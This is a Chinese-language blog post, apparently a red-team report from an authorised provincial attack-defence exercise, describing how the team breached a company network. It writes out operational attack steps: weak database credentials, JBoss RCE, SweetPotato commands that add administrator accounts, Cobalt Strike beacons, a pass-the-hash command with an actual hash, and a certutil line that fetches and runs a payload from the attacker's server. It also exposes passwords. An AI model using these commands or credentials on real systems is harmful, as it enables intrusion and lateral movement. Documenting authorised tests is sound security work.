首页 > 其他分享 >记一次某省HW渗透测试经历

记一次某省HW渗透测试经历

时间:2024-05-11 10:21:17浏览次数:24  
标签:exe 渗透 HW 成果 目标 某省 权限 内网 10.152

0x00 前言

经过演习指挥部授权,攻击团队于2023年5月28日,对xxxxx有限公司单位进行了渗透评估,通过模拟真实网络攻击行为,评估系统是否存在可以被攻击者利用的漏洞以及由此因此引发的风险大小,为制定相应的安全措施与解决方案提供实际的依据。

0x01 目标清单

渗透结果总结汇总如下表:

网站名称

XXX管理系统

网站域名/IP

http://www.xxx.com:5000/console/login.asp

发现时间

2023-5-28

隐患类型

隐患级别

隐患地址

弱口令

高危

http://www.xxx.com:5000/console/login.asp

使用该系统配置虚拟上网桌面,进入内网

紧急

http://www.xxx.com:5000/console/login.asp

内网数据库mysql弱口令

高危

mysql:10.152.1.80:3306:root 123456

内网数据库sql server弱口令-提权

高危

mssql:10.152.1.237:1433:sa Aa123456

内网oa弱口令

高危

10.152.1.152 admin 123456

内网jboss未授权访问-rce提权

高危

http://10.152.1.77:8000

内网jboss未授权访问-rce提权

高危

http://10.152.1.19:8000

内网dee可视化配置工具弱口令

中危

http://10.152.1.80:8085/dee/login!welcome.do

dee_admin dee_admin

内网数据库sql server弱口令-提权

高危

mssql:10.152.1.152:1433:sa 1111111

内网hash传递pth攻击获获取权限

高危

10.152.1.149

内网hash传递pth攻击获获取权限

高危

10.152.1.70

内网hash传递pth攻击获获取权限

高危

10.152.1.82

桌面发现用户密码文件登录oracle数据库

高危

10.152.1.237

0x02 渗透过程

1.渗透路径说明

互联网XXX管理系统http://www.xxx.com:5000/console/default.asp admin,123456登录系统,将内网网关端口映射到公网5000端口,下载利用XXX客户端登录系统,账号为后台账号加密码默认为1,使用账号1密码1,网关设置18x.x.x.x。开启虚拟桌面,进入内网

——>内网xxx系统(URL)

上传一些利用工具到C:\Users\Public\Downloads,使用fscan扫描10.152.0.0/16和192.168.0.0/16网段,整理出扫描结果

----------SSH----------

 

[+] SSH:192.168.2.2:22:root root

 

 

----------mysql----------

 

[+] mysql:10.152.1.80:3306:root 123456

 

 

----------mssql----------

 

[+] mssql:10.152.1.237:1433:sa Aa123456

[+] mssql:10.152.1.152:1433:sa 11111111

 

----------poc----------

 

[+] http://10.152.1.77:8000 poc-yaml-jboss-unauth

[+] http://10.152.1.80:8085 poc-yaml-druid-monitor-unauth

[+] http://10.152.1.19:8000 poc-yaml-jboss-unauth

 

1.使用frpc.exe进行内网穿透,开启socks5代理: 7x.x.x.x:7002,然后使用本机提权工具将两台mssql 弱口令数据库10.152.1.237和10.152.1.152进行提权,上传提权工具SweetPotato.exe以及木马文件beacon1.exe到服务器10.152.1.237目录C:/Users/MSSQLSERVER/Desktop,使用命令: C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user soutt Sou123 /add"

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators soutt /add"添加管理员账号soutt,soutt2两个账号,远程登录之后使用关闭杀软防护上线CS,提权获取system权限。

 

2.利用JBOSS漏洞上线2台机器管理员权限: 10.152.1.77,10.152.1.19

Jboss1:10.152.1.19:利用Jboss漏洞直接远程添加用户,远程登录成功

上线cs:因为不出网,所以在出网服务器10.152.1.237上传proxy.exe代理工具,代理http代理10.152.1.237:8080端口上线内网不出网主机

Jboss2:使用未授权漏洞进行部署shell,然后通过冰蝎上传adduser.exe,使用jboss利用工具运行获得远程账号CXK Aa123456


3.使用CS抓取10.152.1.152主机的hash,使用改hash: cce53c7a2f41bde4bf127f4d3c911875进行pth成功三台主机10.152.1.70,10.152.1.82,10.152.1.149

 

7x.x.x.x pth成功cce53c7a2f41bde4bf127f4d3c911875

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://7x.x.x.x:9999/add.exe

最终:上线8台主机,7台管理员权限,一台云桌面,还有一台linux服务器root权限弱口令: 192.168.2.2:22,root,root

0x03 测试结果

1.成果1

(1)成果目标基本情况

序号

成果描述

01

获取XXX管理系统权限,映射内网网关,进入内网

              目标系统          

目标URL

XXX管理系统

http://www.xxx.com:5000/console/default.asp

目标IP

内网系统

171.221.223.218

威胁类型

获取权限类:

突破网络边界类:√

发现演习前已有攻击事件类:

获取目标系统权限类:

 

(2)成果说明

//攻击过程描述:

1. http://www.xxx.com:5000/console/default.asp admin,123456登录系统,将内网网关端口映射到公网5000端口


 

2. 访问http://www.xxx.com:5000/下载利用XXX客户端登录系统,账号为后台账号加密码默认为1,使用账号1密码1,网关设置18x.x.x.x


 

 

2.成果2

(1)成果目标基本情况

序号

成果描述

02

发现木马文件

              目标系统             

目标URL

远程桌面

10.152.1.63

目标IP

内网系统

10.152.1.63

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:√

获取目标系统权限类:

(2)成果说明

//攻击过程描述:

直接远程桌面进入系统时,发现C:\Program Files\KOUTON\XXX Advanced\Server\Web\upload存在黑客之前上传的木马文件1,asp,1.aspx

 

3.成果3

(1)成果目标基本情况

序号

成果描述

03

获取1w+用户数据,4w+生产订单数据

              目标系统         

目标URL

致远oa u9

http://10.152.1.152/U9/mvc/main/index

目标IP

内网系统

10.152.1.152

威胁类型

获取权限类:√

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:

(2)成果说明

弱口令登录 admin 123456 获取到1w+用户数据,4w+生产订单数据

W4X]XOVZ96~@_O}VUZ6SU}Q

_G}SA7(87K[}AN_F)[APNF5

%G~RKW314@W1{Z281AT6A7L

4.成果4

(1)成果目标基本情况

序号

成果描述

04

弱口令进入管理后台

              目标系统       

目标URL

dee可视化配置工具

http://10.152.1.80:8085/dee/login!welcome.do

dee_admin dee_admin

目标IP

内网系统

10.152.1.80:8085

威胁类型

获取权限类:√

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:

(2)成果说明

弱口令登录 dee_admin dee_admin 登录管理后台

5.成果5

(1)成果目标基本情况

序号

成果描述

05

登录核心mysql数据库

              目标系统             

目标URL

mysql数据库

mysql:10.152.1.80:3306:root 123456

目标IP

内网系统

10.152.1.80:3306

威胁类型

获取权限类:√

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:

(2).成果说明

IMG_256

IMG_256

 

6.成果6

(1)成果目标基本情况

序号

成果描述

06

Mssql弱口令+提权

              目标系统             

目标URL

Mssql数据库

Mssql:10.152.1.237:1433 sa  Aa123456

目标IP

内网系统

10.152.1.237:1433

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2)成果说明

使用frpc.exe进行内网穿透,开启socks5代理: 7x.x.x.x:7002,然后使用本机提权工具将10.152.1.237和10.152.1.152进行提权,上传提权工具SweetPotato.exe以及木马文件beacon1.exe到服务器10.152.1.237目录C:/Users/MSSQLSERVER/Desktop,使用命令: C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net user soutt Sou123 /add"

C:/Users/MSSQLSERVER/Desktop/SweetPotato.exe -a "net localgroup administrators soutt /add"添加管理员账号soutt,soutt2两个账号,远程登录之后使用关闭杀软防护上线CS,提权获取system权限。

7.成果7

(1)成果目标基本情况

序号

成果描述

07

Mssql弱口令+提权

              目标系统             

目标URL

Mssql数据库

Mssql:10.152.1.152:1433 sa 11111111

目标IP

内网系统

10.152.1.152:1433

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2)成果说明

弱口令  sa  11111111

同样的方法,在服务器:10.152.1.152, C:/Users/MSSQLSERVER/上传adduser.exe添加管理员账号,CXK Aa123456

 

8.成果8

(1)成果目标基本情况

序号

成果描述

08

Jobss未授权+rce添加用户

              目标系统             

目标URL

内网

Windows Server 2012

http://10.152.1.19:8000

目标IP

内网系统

10.152.1.19

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2).成果说明

利用JBOSS漏洞上线2台机器管理员权限: 10.152.1.77,10.152.1.19


Jboss1:10.152.1.19:利用Jboss漏洞直接远程添加用户,远程登录成功

上线cs:

因为不出网,所以在出网服务器10.152.1.237上传proxy.exe代理工具,代理http代理10.152.1.237:8080端口上线内网不出网主机

上线成功

9.成果9

(1).成果目标基本情况

序号

成果描述

09

Jobss未授权+rce添加用户

              目标系统             

目标URL

内网

Windows Server 2012

http://10.152.1.77:8000

目标IP

内网系统

10.152.1.77

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2).成果说明

使用未授权漏洞进行部署shell,然后通过冰蝎上传adduser.exe,使用jboss利用工具运行获得远程账号CXK Aa123456

 

C:/temp/adduser.exe

添加用户成功远程连接10.152.1.77


同样的http代理上线cs成功

 

10.成果10

(1).成果目标基本情况

序号

成果描述

10

hash传递pth攻击获获取权限

              目标系统             

目标URL

内网 Windows server2012

10.152.1.70

目标IP

内网系统

10.152.1.70

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

 

(2).成果说明

使用CS抓取10.152.1.152主机的hash,使用改hash: cce53c7a2f41bde4bf127f4d3c911875进行pth成功三台主机10.152.1.70,10.152.1.82,10.152.1.149

7x.x.x.x pth成功cce53c7a2f41bde4bf127f4d3c911875

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://7x.x.x.x:9999/add.exe

下载add.exe执行远程登录这台机器

10.152.1.82: CXK$,sum%TFys7q


运行添加成功, 10.152.1.82: CXK$,sum%TFys7q,然后远程上线cs成功

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]和进行上线70和149主机,同样的方法,上线成功

 

10.152.1.70:CXK Aa123456

 

10.152.1.70:CXK$ GYLMzn5dcL


11.成果11

(1).成果目标基本情况

序号

成果描述

11

hash传递pth攻击获获取权限

              目标系统             

目标URL

内网 Windows server2008

10.152.1.82

目标IP

内网系统

10.152.1.82

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2).成果说明

使用CS抓取10.152.1.152主机的hash,使用改hash: cce53c7a2f41bde4bf127f4d3c911875进行pth成功三台主机10.152.1.70,10.152.1.82,10.152.1.149

7x.x.x.x pth成功cce53c7a2f41bde4bf127f4d3c911875

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://7x.x.x.x:9999/add.exe

下载add.exe执行远程登录这台机器

10.152.1.82: CXK$,sum%TFys7q

运行添加成功, 10.152.1.82: CXK$,sum%TFys7q,然后远程上线cs成功

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]和进行上线70和149主机,同样的方法,上线成功

10.152.1.70:CXK Aa123456

 

10.152.1.70:CXK$ GYLMzn5dcL


 

12.成果12

(1).成果目标基本情况

序号

成果描述

12

hash传递pth攻击获获取权限

              目标系统             

目标URL

内网 Windows server2012

10.152.1.149

目标IP

内网系统

10.152.1.149

威胁类型

获取权限类:

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:√

(2).成果说明

使用CS抓取10.152.1.152主机的hash,使用改hash: cce53c7a2f41bde4bf127f4d3c911875进行pth成功三台主机10.152.1.70,10.152.1.82,10.152.1.149

7x.x.x.x pth成功cce53c7a2f41bde4bf127f4d3c911875

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]进行上线82主机,方法一样的,3台主机都是火绒,vps开启python远程下载服务,使用该命令绕过下载adduser.exe即可

copy c:\windows\system32\certutil.exe a.exe

a.exe -urlcache -split -f http://7x.x.x.x:9999/add.exe

下载add.exe执行远程登录这台机器

10.152.1.82: CXK$,sum%TFys7q

运行添加成功, 10.152.1.82: CXK$,sum%TFys7q,然后远程上线cs成功

使用wmiexec.py脚本: python wmiexec.py -hashes 00000000000000000000000000000000:cce53c7a2f41bde4bf127f4d3c911875 Admi

[email protected]和进行上线70和149主机,同样的方法,上线成功

10.152.1.70:CXK Aa123456

10.152.1.70:CXK$ GYLMzn5dcL

13.成果13

(1).成果目标基本情况

序号

成果描述

13

桌面发现用户密码文件登录数据库

              目标系统             

目标URL

内网 oracle数据库

10.152.1.237

目标IP

内网系统

10.152.1.237

威胁类型

获取权限类:√

突破网络边界类:

发现演习前已有攻击事件类:

获取目标系统权限类:

 

(2).成果详情

查看到账号密码文件,使用桌面的数据库管理工具可以直接连接oracle数据库 sys:MES123456

 

 

0x04 攻击痕迹说明

序号

痕迹类型

URL

存放位置

上传时间

1

上传后门利用工具

10.152.1.63

C:\Users\Public\Downloads

2023-5-28

2

上传后门利用工具

10.152.1.237

C:\Users\soutt\Downloads

C:\Users\Public\Downloads

2023-5-28

3

上传后门利用工具

10.152.1.152

C:\Users\CXK\Downloads

2023-5-29

4

上传后门利用工具

10.152.1.82

C:\Users\Public

C:\

2023-5-29

5

上传后门利用工具

10.152.1.70

C:\Users\CXK\Downloads

C:\

2023-5-29

6

上传后门利用工具

10.152.1.149

C:\Users\CXK$\Downloads

C:\

2023-5-29

7

上传后门利用工具

10.152.1.19

C:\Users\Public\Downloads

2023-5-29


 

 

标签:exe,渗透,HW,成果,目标,某省,权限,内网,10.152
From: https://www.cnblogs.com/backlion/p/18185910

相关文章

  • Core Impact 21.5 (Windows) - 高级渗透测试
    CoreImpact21.5(Windows)-高级渗透测试Fortra|CoreSecurityPenetrationtestingsoftware,ReleaseFeb2024请访问原文链接:CoreImpact21.5(Windows)-高级渗透测试,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgCoreImpact渗透测试软件,安全地发现和......
  • hw
    渗透测试初级面试题1.为何一个MYSQL数据库的站,只有一个80端口开放?答:更改了端口,没有扫描出来;站库分离;3306端口不对外开放。2.一个成熟并且相对安全的CMS,渗透时扫目录的意义?答:敏感文件、二级目录扫描;站长的误操作比如:网站备份的压缩文件、说明.txt、二级目录可能存放......
  • 内网渗透测试是一种测试组织内部网络安全的方法,旨在发现和利用网络中的漏洞以及获取未
    内网渗透测试是一种测试组织内部网络安全的方法,旨在发现和利用网络中的漏洞以及获取未授权访问内部资源的能力。以下是内网渗透测试基础的一些主题:理解内网环境:理解目标组织的网络拓扑、子网划分、主机和服务。收集有关内部网络设备、操作系统、应用程序和安全配置的信......
  • Metasploit Pro 4.22.3-2024050201 (Linux, Windows) - 专业渗透测试框架
    MetasploitPro4.22.3-2024050201(Linux,Windows)-专业渗透测试框架Rapid7Penetrationtesting,ReleaseMay03,2024请访问原文链接:MetasploitPro4.22.3-2024050201(Linux,Windows)-专业渗透测试框架,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org世......
  • 【Python+渗透测试实战】7
    第7章:Python编写一个远程控制程序远程控制是网络安全的一个极为重要的内容,无论是网络安全的维护者还是破坏者都会对此进行研究。维护者的目标是保证远程控制的安全,而破坏者则往往希望能够凭借各种手段来实现对目标设备的远程控制。经过本章的学习,你将掌握以下内容。什么是......
  • Burp Suite Professional 2024.4 for Windows x64 - 领先的 Web 渗透测试软件
    BurpSuiteProfessional2024.4forWindowsx64-领先的Web渗透测试软件世界排名第一的Web渗透测试工具包请访问原文链接:BurpSuiteProfessional2024.4forWindowsx64-领先的Web渗透测试软件,查看最新版。原创作品,转载请保留出处。作者主页:sysin.orgBurpSuite......
  • Burp Suite Professional 2024.4 for macOS x64 & ARM64 - 领先的 Web 渗透测试软件
    BurpSuiteProfessional2024.4formacOSx64&ARM64-领先的Web渗透测试软件世界排名第一的Web渗透测试工具包请访问原文链接:BurpSuiteProfessional2024.4formacOSx64&ARM64-领先的Web渗透测试软件,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org......
  • **关于域渗透学习笔记**
    1、首先判断是否在域环境还是工作组环境netconfigworkstation查看当前登陆域及域用户工作站域显示REDTEAM为域环境工作组显示为WORKGROUPnettime/domain查看域内时间用来分辨是否是域用户,不是域用户会显示拒绝访问2、信息收集ipconfig/all查看当前网卡信息system......
  • 内网渗透神器(Mimikatz)——使用教程
    项目地址:https://github.com/gentilkiwi/mimikatz/一、工具简介Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,本意是用来个人测试,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具。注意:当目标为win10或......
  • Python-Web-渗透测试秘籍(全)
    PythonWeb渗透测试秘籍(全)原文:annas-archive.org/md5/9ECC87991CE5C1AD546C7BAEC6960102译者:飞龙协议:CCBY-NC-SA4.0前言欢迎阅读我们的Python和Web应用测试书。渗透测试是一个庞大的领域,而Python的领域更加广阔。我们希望我们的小书可以帮助您更好地管理这些庞大......